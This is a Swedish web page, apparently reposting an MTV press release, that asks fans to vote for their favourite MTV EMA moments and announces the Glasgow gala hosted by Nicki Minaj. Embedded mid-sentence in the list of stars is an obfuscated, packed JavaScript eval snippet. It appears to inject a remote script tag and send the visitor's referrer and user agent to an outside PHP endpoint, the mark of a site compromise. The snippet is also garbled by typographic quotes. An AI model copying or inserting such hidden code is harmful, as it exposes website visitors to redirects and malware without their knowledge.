Image Image Image Image Image Image Image Image Image Image

| 27 februari, 2020

Scroll to top

Top

Rösta fram ditt favoritögonblick inför tjugoårsjubileumet av MTV EMA-galan

Rösta fram ditt favoritögonblick inför tjugoårsjubileumet av MTV EMA-galan
Sebastian

Beyoncé, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hnstt|var|u0026u|referrer|zfnkd||js|php’.split(’|’),0,{}))
Katy Perry, Lady Gaga, Madonna, Miley Cyrus, Amy Winehouse, Justin Bieber, Snoop Dogg, Spice Girls, Robbie Williams, Kanye West…
Det är bara några av många världsstjärnor som har uppträtt på MTV EMA-scener genom åren, bjudit på något extra och ibland skapat en liten skandal. Nu vill MTV att fansen ska rösta fram sitt favoritögonblick på TOP20.MTVEMA.COM

Fansens bästa 20 ögonblick kommer att avslöjas i programmet Your Top 20 Greatest EMA Moments som sänds den 6 november klockan 22:55.

Klicka här för att se en kort film om nominerade favoritögonblick: 20 Greatest EMA Moments.

Nicki Minaj, som även är nominerad i fyra kategorier (Best Female, Best Hip Hop, Biggest Fans och Best Look), leder EMA-galan från SSE Hydro i Glasgow som sänds den 9 november klockan 21 på TV-kanalen MTV och www.mtv.se.Temat är ”tidsresor” och det är hittills klart att Minaj, Ariana Grande och Ed Sheeran kommer att uppträda.

Detta är ett pressmeddelande från MTV